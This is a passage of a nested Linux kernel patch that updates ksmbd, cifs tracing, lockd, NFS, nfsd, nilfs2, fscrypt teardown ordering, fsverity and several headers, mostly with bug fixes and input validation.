+ 		int	create_options,
+ 		int	desired_access),
+-	TP_ARGS(xid, tid, sesid, create_options, desired_access),
++	TP_ARGS(xid, tid, sesid, full_path, create_options, desired_access),
+ 	TP_STRUCT__entry(
+ 		__field(unsigned int, xid)
+ 		__field(__u32, tid)
+ 		__field(__u64, sesid)
++		__string(path, full_path)
+ 		__field(int, create_options)
+ 		__field(int, desired_access)
+ 	),
+@@ -715,11 +717,12 @@ DECLARE_EVENT_CLASS(smb3_open_enter_class,
+ 		__entry->xid = xid;
+ 		__entry->tid = tid;
+ 		__entry->sesid = sesid;
++		__assign_str(path, full_path);
+ 		__entry->create_options = create_options;
+ 		__entry->desired_access = desired_access;
+ 	),
+-	TP_printk("xid=%u sid=0x%llx tid=0x%x cr_opts=0x%x des_access=0x%x",
+-		__entry->xid, __entry->sesid, __entry->tid,
++	TP_printk("xid=%u sid=0x%llx tid=0x%x path=%s cr_opts=0x%x des_access=0x%x",
++		__entry->xid, __entry->sesid, __entry->tid, __get_str(path),
+ 		__entry->create_options, __entry->desired_access)
+ )
+ 
+@@ -728,9 +731,10 @@ DEFINE_EVENT(smb3_open_enter_class, smb3_##name,  \
+ 	TP_PROTO(unsigned int xid,		\
+ 		__u32	tid,			\
+ 		__u64	sesid,			\
++		const char *full_path,		\
+ 		int	create_options,		\
+ 		int	desired_access),	\
+-	TP_ARGS(xid, tid, sesid, create_options, desired_access))
++	TP_ARGS(xid, tid, sesid, full_path, create_options, desired_access))
+ 
+ DEFINE_SMB3_OPEN_ENTER_EVENT(open_enter);
+ DEFINE_SMB3_OPEN_ENTER_EVENT(posix_mkdir_enter);
+diff --git a/fs/ksmbd/auth.c b/fs/ksmbd/auth.c
+index 6e61b5bc7d86e..cead696b656a8 100644
+--- a/fs/ksmbd/auth.c
++++ b/fs/ksmbd/auth.c
+@@ -727,8 +727,9 @@ static int generate_key(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+ 		goto smb3signkey_ret;
+ 	}
+ 
+-	if (conn->cipher_type == SMB2_ENCRYPTION_AES256_CCM ||
+-	    conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM)
++	if (key_size == SMB3_ENC_DEC_KEY_SIZE &&
++	    (conn->cipher_type == SMB2_ENCRYPTION_AES256_CCM ||
++	     conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM))
+ 		rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx), L256, 4);
+ 	else
+ 		rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx), L128, 4);
+diff --git a/fs/ksmbd/connection.c b/fs/ksmbd/connection.c
+index 56be077e5d8ac..2be9d7460494b 100644
+--- a/fs/ksmbd/connection.c
++++ b/fs/ksmbd/connection.c
+@@ -298,7 +298,7 @@ int ksmbd_conn_handler_loop(void *p)
+ 		kvfree(conn->request_buf);
+ 		conn->request_buf = NULL;
+ 
+-		size = t->ops->read(t, hdr_buf, sizeof(hdr_buf));
++		size = t->ops->read(t, hdr_buf, sizeof(hdr_buf), -1);
+ 		if (size != sizeof(hdr_buf))
+ 			break;
+ 
+@@ -319,13 +319,10 @@ int ksmbd_conn_handler_loop(void *p)
+ 		}
+ 
+ 		/*
+-		 * Check if pdu size is valid (min : smb header size,
+-		 * max : 0x00FFFFFF).
++		 * Check the maximum pdu size (0x00FFFFFF).
+ 		 */
+-		if (pdu_size < __SMB2_HEADER_STRUCTURE_SIZE ||
+-		    pdu_size > MAX_STREAM_PROT_LEN) {
++		if (pdu_size > MAX_STREAM_PROT_LEN)
+ 			break;
+-		}
+ 
+ 		/* 4 for rfc1002 length field */
+ 		size = pdu_size + 4;
+@@ -344,7 +341,7 @@ int ksmbd_conn_handler_loop(void *p)
+ 		 * We already read 4 bytes to find out PDU size, now
+ 		 * read in PDU
+ 		 */
+-		size = t->ops->read(t, conn->request_buf + 4, pdu_size);
++		size = t->ops->read(t, conn->request_buf + 4, pdu_size, 2);
+ 		if (size < 0) {
+ 			pr_err("sock_read failed: %d\n", size);
+ 			break;
+diff --git a/fs/ksmbd/connection.h b/fs/ksmbd/connection.h
+index 3643354a3fa79..0e3a848defaf3 100644
+--- a/fs/ksmbd/connection.h
++++ b/fs/ksmbd/connection.h
+@@ -114,7 +114,8 @@ struct ksmbd_transport_ops {
+ 	int (*prepare)(struct ksmbd_transport *t);
+ 	void (*disconnect)(struct ksmbd_transport *t);
+ 	void (*shutdown)(struct ksmbd_transport *t);
+-	int (*read)(struct ksmbd_transport *t, char *buf, unsigned int size);
++	int (*read)(struct ksmbd_transport *t, char *buf,
++		    unsigned int size, int max_retries);
+ 	int (*writev)(struct ksmbd_transport *t, struct kvec *iovs, int niov,
+ 		      int size, bool need_invalidate_rkey,
+ 		      unsigned int remote_key);
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index 875eecc6b95e7..d0e76e2a14982 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -2996,8 +2996,11 @@ int smb2_open(struct ksmbd_work *work)
+ 							sizeof(struct smb_acl) +
+ 							sizeof(struct smb_ace) * ace_num * 2,
+ 							GFP_KERNEL);
+-					if (!pntsd)
++					if (!pntsd) {
++						posix_acl_release(fattr.cf_acls);
++						posix_acl_release(fattr.cf_dacls);
+ 						goto err_out;
++					}
+ 
+ 					rc = build_sec_desc(user_ns,
+ 							    pntsd, NULL, 0,
+@@ -4953,6 +4956,10 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 
+ 		info->Attributes |= cpu_to_le32(server_conf.share_fake_fscaps);
+ 
++		if (test_share_config_flag(work->tcon->share_conf,
++		    KSMBD_SHARE_FLAG_STREAMS))
++			info->Attributes |= cpu_to_le32(FILE_NAMED_STREAMS);
++
+ 		info->MaxPathNameComponentLength = cpu_to_le32(stfs.f_namelen);
+ 		len = smbConvertToUTF16((__le16 *)info->FileSystemName,
+ 					"NTFS", PATH_MAX, conn->local_nls, 0);
+@@ -7463,13 +7470,16 @@ static int fsctl_query_allocated_ranges(struct ksmbd_work *work, u64 id,
+ 	if (in_count == 0)
+ 		return -EINVAL;
+ 
++	start = le64_to_cpu(qar_req->file_offset);
++	length = le64_to_cpu(qar_req->length);
++
++	if (start < 0 || length < 0)
++		return -EINVAL;
++
+ 	fp = ksmbd_lookup_fd_fast(work, id);
+ 	if (!fp)
+ 		return -ENOENT;
+ 
+-	start = le64_to_cpu(qar_req->file_offset);
+-	length = le64_to_cpu(qar_req->length);
+-
+ 	ret = ksmbd_vfs_fqar_lseek(fp, start, length,
+ 				   qar_rsp, in_count, out_count);
+ 	if (ret && ret != -E2BIG)
+@@ -7770,7 +7780,7 @@ int smb2_ioctl(struct ksmbd_work *work)
+ 
+ 		off = le64_to_cpu(zero_data->FileOffset);
+ 		bfz = le64_to_cpu(zero_data->BeyondFinalZero);
+-		if (off > bfz) {
++		if (off < 0 || bfz < 0 || off > bfz) {
+ 			ret = -EINVAL;
+ 			goto out;
+ 		}
+diff --git a/fs/ksmbd/smb_common.c b/fs/ksmbd/smb_common.c
+index 2a4fbbd55b91f..5ab93fe0dec3f 100644
+--- a/fs/ksmbd/smb_common.c
++++ b/fs/ksmbd/smb_common.c
+@@ -434,7 +434,7 @@ int ksmbd_extract_shortname(struct ksmbd_conn *conn, const char *longname,
+ 
+ static int __smb2_negotiate(struct ksmbd_conn *conn)
+ {
+-	return (conn->dialect >= SMB21_PROT_ID &&
++	return (conn->dialect >= SMB20_PROT_ID &&
+ 		conn->dialect <= SMB311_PROT_ID);
+ }
+ 
+@@ -442,9 +442,26 @@ static int smb_handle_negotiate(struct ksmbd_work *work)
+ {
+ 	struct smb_negotiate_rsp *neg_rsp = work->response_buf;
+ 
+-	ksmbd_debug(SMB, "Unsupported SMB protocol\n");
+-	neg_rsp->hdr.Status.CifsError = STATUS_INVALID_LOGON_TYPE;
+-	return -EINVAL;
++	ksmbd_debug(SMB, "Unsupported SMB1 protocol\n");
++
++	/*
++	 * Remove 4 byte direct TCP header, add 2 byte bcc and
++	 * 2 byte DialectIndex.
++	 */
++	*(__be32 *)work->response_buf =
++		cpu_to_be32(sizeof(struct smb_hdr) - 4 + 2 + 2);
++	neg_rsp->hdr.Status.CifsError = STATUS_SUCCESS;
++
++	neg_rsp->hdr.Command = SMB_COM_NEGOTIATE;
++	*(__le32 *)neg_rsp->hdr.Protocol = SMB1_PROTO_NUMBER;
++	neg_rsp->hdr.Flags = SMBFLG_RESPONSE;
++	neg_rsp->hdr.Flags2 = SMBFLG2_UNICODE | SMBFLG2_ERR_STATUS |
++		SMBFLG2_EXT_SEC | SMBFLG2_IS_LONG_NAME;
++
++	neg_rsp->hdr.WordCount = 1;
++	neg_rsp->DialectIndex = cpu_to_le16(work->conn->dialect);
++	neg_rsp->ByteCount = 0;
++	return 0;
+ }
+ 
+ int ksmbd_smb_negotiate_common(struct ksmbd_work *work, unsigned int command)
+@@ -465,7 +482,7 @@ int ksmbd_smb_negotiate_common(struct ksmbd_work *work, unsigned int command)
+ 		}
+ 	}
+ 
+-	if (command == SMB2_NEGOTIATE_HE && __smb2_negotiate(conn)) {
++	if (command == SMB2_NEGOTIATE_HE) {
+ 		ret = smb2_handle_negotiate(work);
+ 		init_smb2_neg_rsp(work);
+ 		return ret;
+diff --git a/fs/ksmbd/smb_common.h b/fs/ksmbd/smb_common.h
+index e663ab9ea7590..d30ce4c1a1517 100644
+--- a/fs/ksmbd/smb_common.h
++++ b/fs/ksmbd/smb_common.h
+@@ -158,8 +158,15 @@
+ 
+ #define SMB1_PROTO_NUMBER		cpu_to_le32(0x424d53ff)
+ #define SMB_COM_NEGOTIATE		0x72
+-
+ #define SMB1_CLIENT_GUID_SIZE		(16)
++
++#define SMBFLG_RESPONSE 0x80	/* this PDU is a response from server */
++
++#define SMBFLG2_IS_LONG_NAME	cpu_to_le16(0x40)
++#define SMBFLG2_EXT_SEC		cpu_to_le16(0x800)
++#define SMBFLG2_ERR_STATUS	cpu_to_le16(0x4000)
++#define SMBFLG2_UNICODE		cpu_to_le16(0x8000)
++
+ struct smb_hdr {
+ 	__be32 smb_buf_length;
+ 	__u8 Protocol[4];
+@@ -199,28 +206,7 @@ struct smb_negotiate_req {
+ struct smb_negotiate_rsp {
+ 	struct smb_hdr hdr;     /* wct = 17 */
+ 	__le16 DialectIndex; /* 0xFFFF = no dialect acceptable */
+-	__u8 SecurityMode;
+-	__le16 MaxMpxCount;
+-	__le16 MaxNumberVcs;
+-	__le32 MaxBufferSize;
+-	__le32 MaxRawSize;
+-	__le32 SessionKey;
+-	__le32 Capabilities;    /* see below */
+-	__le32 SystemTimeLow;
+-	__le32 SystemTimeHigh;
+-	__le16 ServerTimeZone;
+-	__u8 EncryptionKeyLength;
+ 	__le16 ByteCount;
+-	union {
+-		unsigned char EncryptionKey[8]; /* cap extended security off */
+-		/* followed by Domain name - if extended security is off */
+-		/* followed by 16 bytes of server GUID */
+-		/* then security blob if cap_extended_security negotiated */
+-		struct {
+-			unsigned char GUID[SMB1_CLIENT_GUID_SIZE];
+-			unsigned char SecurityBlob[1];
+-		} __packed extended_response;
+-	} __packed u;
+ } __packed;
+ 
+ struct filesystem_attribute_info {
+diff --git a/fs/ksmbd/transport_rdma.c b/fs/ksmbd/transport_rdma.c
+index 096eda9ef873b..c06efc020bd95 100644
+--- a/fs/ksmbd/transport_rdma.c
++++ b/fs/ksmbd/transport_rdma.c
+@@ -670,7 +670,7 @@ static int smb_direct_post_recv(struct smb_direct_transport *t,
+ }
+ 
+ static int smb_direct_read(struct ksmbd_transport *t, char *buf,
+-			   unsigned int size)
++			   unsigned int size, int unused)
+ {
+ 	struct smb_direct_recvmsg *recvmsg;
+ 	struct smb_direct_data_transfer *data_transfer;
+diff --git a/fs/ksmbd/transport_tcp.c b/fs/ksmbd/transport_tcp.c
+index 603893fd87f57..20e85e2701f26 100644
+--- a/fs/ksmbd/transport_tcp.c
++++ b/fs/ksmbd/transport_tcp.c
+@@ -291,16 +291,18 @@ static int ksmbd_tcp_run_kthread(struct interface *iface)
+ 
+ /**
+  * ksmbd_tcp_readv() - read data from socket in given iovec
+- * @t:		TCP transport instance
+- * @iov_orig:	base IO vector
+- * @nr_segs:	number of segments in base iov
+- * @to_read:	number of bytes to read from socket
++ * @t:			TCP transport instance
++ * @iov_orig:		base IO vector
++ * @nr_segs:		number of segments in base iov
++ * @to_read:		number of bytes to read from socket
++ * @max_retries:	maximum retry count
+  *
+  * Return:	on success return number of bytes read from socket,
+  *		otherwise return error number
+  */
+ static int ksmbd_tcp_readv(struct tcp_transport *t, struct kvec *iov_orig,
+-			   unsigned int nr_segs, unsigned int to_read)
++			   unsigned int nr_segs, unsigned int to_read,
++			   int max_retries)
+ {
+ 	int length = 0;
+ 	int total_read;
+@@ -308,7 +310,6 @@ static int ksmbd_tcp_readv(struct tcp_transport *t, struct kvec *iov_orig,
+ 	struct msghdr ksmbd_msg;
+ 	struct kvec *iov;
+ 	struct ksmbd_conn *conn = KSMBD_TRANS(t)->conn;
+-	int max_retry = 2;
+ 
+ 	iov = get_conn_iovec(t, nr_segs);
+ 	if (!iov)
+@@ -335,14 +336,23 @@ static int ksmbd_tcp_readv(struct tcp_transport *t, struct kvec *iov_orig,
+ 		} else if (conn->status == KSMBD_SESS_NEED_RECONNECT) {
+ 			total_read = -EAGAIN;
+ 			break;
+-		} else if ((length == -ERESTARTSYS || length == -EAGAIN) &&
+-			   max_retry) {
++		} else if (length == -ERESTARTSYS || length == -EAGAIN) {
++			/*
++			 * If max_retries is negative, allow unlimited
++			 * retries to keep the connection with inactive sessions.
++			 */
++			if (max_retries == 0) {
++				total_read = length;
++				break;
++			} else if (max_retries > 0) {
++				max_retries--;
++			}
++
+ 			usleep_range(1000, 2000);
+ 			length = 0;
+-			max_retry--;
+ 			continue;
+ 		} else if (length <= 0) {
+-			total_read = -EAGAIN;
++			total_read = length;
+ 			break;
+ 		}
+ 	}
+@@ -358,14 +368,15 @@ static int ksmbd_tcp_readv(struct tcp_transport *t, struct kvec *iov_orig,
+  * Return:	on success return number of bytes read from socket,
+  *		otherwise return error number
+  */
+-static int ksmbd_tcp_read(struct ksmbd_transport *t, char *buf, unsigned int to_read)
++static int ksmbd_tcp_read(struct ksmbd_transport *t, char *buf,
++			  unsigned int to_read, int max_retries)
+ {
+ 	struct kvec iov;
+ 
+ 	iov.iov_base = buf;
+ 	iov.iov_len = to_read;
+ 
+-	return ksmbd_tcp_readv(TCP_TRANS(t), &iov, 1, to_read);
++	return ksmbd_tcp_readv(TCP_TRANS(t), &iov, 1, to_read, max_retries);
+ }
+ 
+ static int ksmbd_tcp_writev(struct ksmbd_transport *t, struct kvec *iov,
+diff --git a/fs/lockd/clnt4xdr.c b/fs/lockd/clnt4xdr.c
+index 7df6324ccb8ab..8161667c976f8 100644
+--- a/fs/lockd/clnt4xdr.c
++++ b/fs/lockd/clnt4xdr.c
+@@ -261,7 +261,6 @@ static int decode_nlm4_holder(struct xdr_stream *xdr, struct nlm_res *result)
+ 	u32 exclusive;
+ 	int error;
+ 	__be32 *p;
+-	s32 end;
+ 
+ 	memset(lock, 0, sizeof(*lock));
+ 	locks_init_lock(fl);
+@@ -285,13 +284,7 @@ static int decode_nlm4_holder(struct xdr_stream *xdr, struct nlm_res *result)
+ 	fl->fl_type  = exclusive != 0 ? F_WRLCK : F_RDLCK;
+ 	p = xdr_decode_hyper(p, &l_offset);
+ 	xdr_decode_hyper(p, &l_len);
+-	end = l_offset + l_len - 1;
+-
+-	fl->fl_start = (loff_t)l_offset;
+-	if (l_len == 0 || end < 0)
+-		fl->fl_end = OFFSET_MAX;
+-	else
+-		fl->fl_end = (loff_t)end;
++	nlm4svc_set_file_lock_range(fl, l_offset, l_len);
+ 	error = 0;
+ out:
+ 	return error;
+diff --git a/fs/lockd/xdr4.c b/fs/lockd/xdr4.c
+index 712fdfeb8ef06..5fcbf30cd2759 100644
+--- a/fs/lockd/xdr4.c
++++ b/fs/lockd/xdr4.c
+@@ -33,6 +33,17 @@ loff_t_to_s64(loff_t offset)
+ 	return res;
+ }
+ 
++void nlm4svc_set_file_lock_range(struct file_lock *fl, u64 off, u64 len)
++{
++	s64 end = off + len - 1;
++
++	fl->fl_start = off;
++	if (len == 0 || end < 0)
++		fl->fl_end = OFFSET_MAX;
++	else
++		fl->fl_end = end;
++}
++
+ /*
+  * NLM file handles are defined by specification to be a variable-length
+  * XDR opaque no longer than 1024 bytes. However, this implementation
+@@ -80,7 +91,7 @@ svcxdr_decode_lock(struct xdr_stream *xdr, struct nlm_lock *lock)
+ 	locks_init_lock(fl);
+ 	fl->fl_flags = FL_POSIX;
+ 	fl->fl_type  = F_RDLCK;
+-
++	nlm4svc_set_file_lock_range(fl, lock->lock_start, lock->lock_len);
+ 	return true;
+ }
+ 
+diff --git a/fs/nfs/dir.c b/fs/nfs/dir.c
+index f7e4a88d5d929..e28dd6475e390 100644
+--- a/fs/nfs/dir.c
++++ b/fs/nfs/dir.c
+@@ -3089,7 +3089,6 @@ static void nfs_access_add_rbtree(struct inode *inode,
+ 		else
+ 			goto found;
+ 	}
+-	set->timestamp = ktime_get_ns();
+ 	rb_link_node(&set->rb_node, parent, p);
+ 	rb_insert_color(&set->rb_node, root_node);
+ 	list_add_tail(&set->lru, &nfsi->access_cache_entry_lru);
+@@ -3114,6 +3113,7 @@ void nfs_access_add_cache(struct inode *inode, struct nfs_access_entry *set,
+ 	cache->fsgid = cred->fsgid;
+ 	cache->group_info = get_group_info(cred->group_info);
+ 	cache->mask = set->mask;
++	cache->timestamp = ktime_get_ns();
+ 
+ 	/* The above field assignments must be visible
+ 	 * before this item appears on the lru.  We cannot easily
+diff --git a/fs/nfs/read.c b/fs/nfs/read.c
+index 8ae2c8d1219d8..cd970ce62786b 100644
+--- a/fs/nfs/read.c
++++ b/fs/nfs/read.c
+@@ -15,6 +15,7 @@
+ #include <linux/stat.h>
+ #include <linux/mm.h>
+ #include <linux/slab.h>
++#include <linux/task_io_accounting_ops.h>
+ #include <linux/pagemap.h>
+ #include <linux/sunrpc/clnt.h>
+ #include <linux/nfs_fs.h>
+@@ -338,6 +339,7 @@ int nfs_read_folio(struct file *file, struct folio *folio)
+ 
+ 	trace_nfs_aop_readpage(inode, page);
+ 	nfs_inc_stats(inode, NFSIOS_VFSREADPAGE);
++	task_io_account_read(folio_size(folio));
+ 
+ 	/*
+ 	 * Try to flush any pending writes to the file..
+@@ -400,6 +402,7 @@ void nfs_readahead(struct readahead_control *ractl)
+ 
+ 	trace_nfs_aop_readahead(inode, readahead_pos(ractl), nr_pages);
+ 	nfs_inc_stats(inode, NFSIOS_VFSREADPAGES);
++	task_io_account_read(readahead_length(ractl));
+ 
+ 	ret = -ESTALE;
+ 	if (NFS_STALE(inode))
+diff --git a/fs/nfsd/vfs.c b/fs/nfsd/vfs.c
+index bb1e85586dfdd..5308070a47f38 100644
+--- a/fs/nfsd/vfs.c
++++ b/fs/nfsd/vfs.c
+@@ -937,8 +937,15 @@ nfsd_splice_actor(struct pipe_inode_info *pipe, struct pipe_buffer *buf,
+ 	struct page *last_page;
+ 
+ 	last_page = page + (offset + sd->len - 1) / PAGE_SIZE;
+-	for (page += offset / PAGE_SIZE; page <= last_page; page++)
++	for (page += offset / PAGE_SIZE; page <= last_page; page++) {
++		/*
++		 * Skip page replacement when extending the contents
++		 * of the current page.
++		 */
++		if (page == *(rqstp->rq_next_page - 1))
++			continue;
+ 		svc_rqst_replace_page(rqstp, page);
++	}
+ 	if (rqstp->rq_res.page_len == 0)	// first call
+ 		rqstp->rq_res.page_base = offset % PAGE_SIZE;
+ 	rqstp->rq_res.page_len += sd->len;
+diff --git a/fs/nilfs2/ioctl.c b/fs/nilfs2/ioctl.c
+index b4041d0566a9a..ef9f9a2511b72 100644
+--- a/fs/nilfs2/ioctl.c
++++ b/fs/nilfs2/ioctl.c
+@@ -71,7 +71,7 @@ static int nilfs_ioctl_wrap_copy(struct the_nilfs *nilfs,
+ 	if (argv->v_index > ~(__u64)0 - argv->v_nmembs)
+ 		return -EINVAL;
+ 
+-	buf = (void *)__get_free_pages(GFP_NOFS, 0);
++	buf = (void *)get_zeroed_page(GFP_NOFS);
+ 	if (unlikely(!buf))
+ 		return -ENOMEM;
+ 	maxmembs = PAGE_SIZE / argv->v_size;
+diff --git a/fs/super.c b/fs/super.c
+index cf737ec2bd05c..e35f601eee298 100644
+--- a/fs/super.c
++++ b/fs/super.c
+@@ -476,13 +476,22 @@ void generic_shutdown_super(struct super_block *sb)
+ 
+ 		cgroup_writeback_umount();
+ 
+-		/* evict all inodes with zero refcount */
++		/* Evict all inodes with zero refcount. */
+ 		evict_inodes(sb);
+-		/* only nonzero refcount inodes can have marks */
++
++		/*
++		 * Clean up and evict any inodes that still have references due
++		 * to fsnotify or the security policy.
++		 */
+ 		fsnotify_sb_delete(sb);
+-		fscrypt_destroy_keyring(sb);
+ 		security_sb_delete(sb);
+ 
++		/*
++		 * Now that all potentially-encrypted inodes have been evicted,
++		 * the fscrypt keyring can be destroyed.
++		 */
++		fscrypt_destroy_keyring(sb);
++
+ 		if (sb->s_dio_done_wq) {
+ 			destroy_workqueue(sb->s_dio_done_wq);
+ 			sb->s_dio_done_wq = NULL;
+diff --git a/fs/verity/verify.c b/fs/verity/verify.c
+index 961ba248021f9..ffac380bd8885 100644
+--- a/fs/verity/verify.c
++++ b/fs/verity/verify.c
+@@ -269,15 +269,15 @@ EXPORT_SYMBOL_GPL(fsverity_enqueue_verify_work);
+ int __init fsverity_init_workqueue(void)
+ {
+ 	/*
+-	 * Use an unbound workqueue to allow bios to be verified in parallel
+-	 * even when they happen to complete on the same CPU.  This sacrifices
+-	 * locality, but it's worthwhile since hashing is CPU-intensive.
++	 * Use a high-priority workqueue to prioritize verification work, which
++	 * blocks reads from completing, over regular application tasks.
+ 	 *
+-	 * Also use a high-priority workqueue to prioritize verification work,
+-	 * which blocks reads from completing, over regular application tasks.
++	 * For performance reasons, don't use an unbound workqueue.  Using an
++	 * unbound workqueue for crypto operations causes excessive scheduler
++	 * latency on ARM64.
+ 	 */
+ 	fsverity_read_workqueue = alloc_workqueue("fsverity_read_queue",
+-						  WQ_UNBOUND | WQ_HIGHPRI,
++						  WQ_HIGHPRI,
+ 						  num_online_cpus());
+ 	if (!fsverity_read_workqueue)
+ 		return -ENOMEM;
+diff --git a/include/linux/acpi_mdio.h b/include/linux/acpi_mdio.h
+index 0a24ab7cb66fa..8e2eefa9fbc0f 100644
+--- a/include/linux/acpi_mdio.h
++++ b/include/linux/acpi_mdio.h
+@@ -9,7 +9,14 @@
+ #include <linux/phy.h>
+ 
+ #if IS_ENABLED(CONFIG_ACPI_MDIO)
+-int acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *fwnode);
++int __acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *fwnode,
++			    struct module *owner);
++
++static inline int
++acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *handle)
++{
++	return __acpi_mdiobus_register(mdio, handle, THIS_MODULE);
++}
+ #else /* CONFIG_ACPI_MDIO */
+ static inline int
+ acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *fwnode)
+diff --git a/include/linux/context_tracking.h b/include/linux/context_tracking.h
+index d4afa8508a806..3a7909ed54980 100644
+--- a/include/linux/context_tracking.h
++++ b/include/linux/context_tracking.h
+@@ -96,6 +96,7 @@ static inline void user_exit_irqoff(void) { }
+ static inline int exception_enter(void) { return 0; }
+ static inline void exception_exit(enum ctx_state prev_ctx) { }
+ static inline int ct_state(void) { return -1; }
++static inline int __ct_state(void) { return -1; }
+ static __always_inline bool context_tracking_guest_enter(void) { return false; }
+ static inline void context_tracking_guest_exit(void) { }
+ #define CT_WARN_ON(cond) do { } while (0)
+diff --git a/include/linux/context_tracking_state.h b/include/linux/context_tracking_state.h
+index 4a4d56f771802..fdd537ea513ff 100644
+--- a/include/linux/context_tracking_state.h
++++ b/include/linux/context_tracking_state.h
+@@ -46,7 +46,9 @@ struct context_tracking {
+ 
+ #ifdef CONFIG_CONTEXT_TRACKING
+ DECLARE_PER_CPU(struct context_tracking, context_tracking);
++#endif
+ 
++#ifdef CONFIG_CONTEXT_TRACKING_USER
+ static __always_inline int __ct_state(void)
+ {
+ 	return arch_atomic_read(this_cpu_ptr(&context_tracking.state)) & CT_STATE_MASK;
+diff --git a/include/linux/efi.h b/include/linux/efi.h
+index 98598bd1d2fa5..ac22f7ca195a4 100644
+--- a/include/linux/efi.h
++++ b/include/linux/efi.h
+@@ -688,6 +688,7 @@ efi_guid_to_str(efi_guid_t *guid, char *out)
+ }
+ 
+ extern void efi_init (void);
++extern void efi_earlycon_reprobe(void);
+ #ifdef CONFIG_EFI
+ extern void efi_enter_virtual_mode (void);	/* switch EFI to virtual mode, if possible */
+ #else
+diff --git a/include/linux/io_uring.h b/include/linux/io_uring.h
+index 934e5dd4ccc08..35b9328ca3352 100644
+--- a/include/linux/io_uring.h
++++ b/include/linux/io_uring.h
+@@ -27,7 +27,7 @@ struct io_uring_cmd {
+ 	const void	*cmd;
+ 	union {
+ 		/* callback to defer completions to task context */
+-		void (*task_work_cb)(struct io_uring_cmd *cmd);
++		void (*task_work_cb)(struct io_uring_cmd *cmd, unsigned);
+ 		/* used for polled completion */
+ 		void *cookie;
+ 	};
+@@ -39,9 +39,10 @@ struct io_uring_cmd {
+ #if defined(CONFIG_IO_URING)
+ int io_uring_cmd_import_fixed(u64 ubuf, unsigned long len, int rw,
+ 			      struct iov_iter *iter, void *ioucmd);
+-void io_uring_cmd_done(struct io_uring_cmd *cmd, ssize_t ret, ssize_t res2);
++void io_uring_cmd_done(struct io_uring_cmd *cmd, ssize_t ret, ssize_t res2,
++			unsigned issue_flags);
+ void io_uring_cmd_complete_in_task(struct io_uring_cmd *ioucmd,
+-			void (*task_work_cb)(struct io_uring_cmd *));
++			void (*task_work_cb)(struct io_uring_cmd *, unsigned));
+ struct sock *io_uring_get_socket(struct file *file);
+ void __io_uring_cancel(bool cancel_all);
+ void __io_uring_free(struct task_struct *tsk);
+@@ -72,11 +73,11 @@ static inline int io_uring_cmd_import_fixed(u64 ubuf, unsigned long len, int rw,
+ 	return -EOPNOTSUPP;
+ }
+ static inline void io_uring_cmd_done(struct io_uring_cmd *cmd, ssize_t ret,
+-		ssize_t ret2)
++		ssize_t ret2, unsigned issue_flags)
+ {
+ }
+ static inline void io_uring_cmd_complete_in_task(struct io_uring_cmd *ioucmd,
+-			void (*task_work_cb)(struct io_uring_cmd *))
++			void (*task_work_cb)(struct io_uring_cmd *, unsigned))
+ {
+ }
+ static inline struct sock *io_uring_get_socket(struct file *file)
+diff --git a/include/linux/lockd/xdr4.h b/include/linux/lockd/xdr4.h
+index 9a6b55da8fd64..72831e35dca32 100644
+--- a/include/linux/lockd/xdr4.h
++++ b/include/linux/lockd/xdr4.h
+@@ -22,6 +22,7 @@
+ #define	nlm4_fbig		cpu_to_be32(NLM_FBIG)
+ #define	nlm4_failed		cpu_to_be32(NLM_FAILED)
+ 
++void	nlm4svc_set_file_lock_range(struct file_lock *fl, u64 off, u64 len);
+ bool	nlm4svc_decode_void(struct svc_rqst *rqstp, struct xdr_stream *xdr);
+ bool	nlm4svc_decode_testargs(struct svc_rqst *rqstp, struct xdr_stream *xdr);
+ bool	nlm4svc_decode_lockargs(struct svc_rqst *rqstp, struct xdr_stream *xdr);
+diff --git a/include/linux/nvme-tcp.h b/include/linux/nvme-tcp.h
+index 75470159a194d..57ebe1267f7fb 100644
+--- a/include/linux/nvme-tcp.h
++++ b/include/linux/nvme-tcp.h
+@@ -115,8 +115,9 @@ struct nvme_tcp_icresp_pdu {
+ struct nvme_tcp_term_pdu {
+ 	struct nvme_tcp_hdr	hdr;
+ 	__le16			fes;
+-	__le32			fei;
+-	__u8			rsvd[8];
++	__le16			feil;
++	__le16			feiu;
++	__u8			rsvd[10];
+ };
+ 
+ /**
+diff --git a/include/linux/of_mdio.h b/include/linux/of_mdio.h
+index da633d34ab866..8a52ef2e6fa6b 100644
+--- a/include/linux/of_mdio.h
++++ b/include/linux/of_mdio.h
+@@ -14,9 +14,25 @@
+ 
+ #if IS_ENABLED(CONFIG_OF_MDIO)
+ bool of_mdiobus_child_is_phy(struct device_node *child);
+-int of_mdiobus_register(struct mii_bus *mdio, struct device_node *np);
+-int devm_of_mdiobus_register(struct device *dev, struct mii_bus *mdio,
+-			     struct device_node *np);
++int __of_mdiobus_register(struct mii_bus *mdio, struct device_node *np,
++			  struct module *owner);
++
++static inline int of_mdiobus_register(struct mii_bus *mdio,
++				      struct device_node *np)
++{
++	return __of_mdiobus_register(mdio, np, THIS_MODULE);
++}
++
++int __devm_of_mdiobus_register(struct device *dev, struct mii_bus *mdio,
++			       struct device_node *np, struct module *owner);
++
++static inline int devm_of_mdiobus_register(struct device *dev,
++					   struct mii_bus *mdio,
++					   struct device_node *np)
++{
++	return __devm_of_mdiobus_register(dev, mdio, np, THIS_MODULE);
++}
++
+ struct mdio_device *of_mdio_find_device(struct device_node *np);
+ struct phy_device *of_phy_find_device(struct device_node *phy_np);
+ struct phy_device *
+diff --git a/include/linux/stmmac.h b/include/linux/stmmac.h
+index a152678b82b71..a2414c1874837 100644
+--- a/include/linux/stmmac.h
++++ b/include/linux/stmmac.h
+@@ -215,7 +215,7 @@ struct plat_stmmacenet_data {
+ 	int unicast_filter_entries;
+ 	int tx_fifo_size;
+ 	int rx_fifo_size;
+-	u32 addr64;
++	u32 host_dma_width;
+ 	u32 rx_queues_to_use;
+ 	u32 tx_queues_to_use;
+ 	u8 rx_sched_algorithm;
+diff --git a/include/linux/sysfb.h b/include/linux/sysfb.h
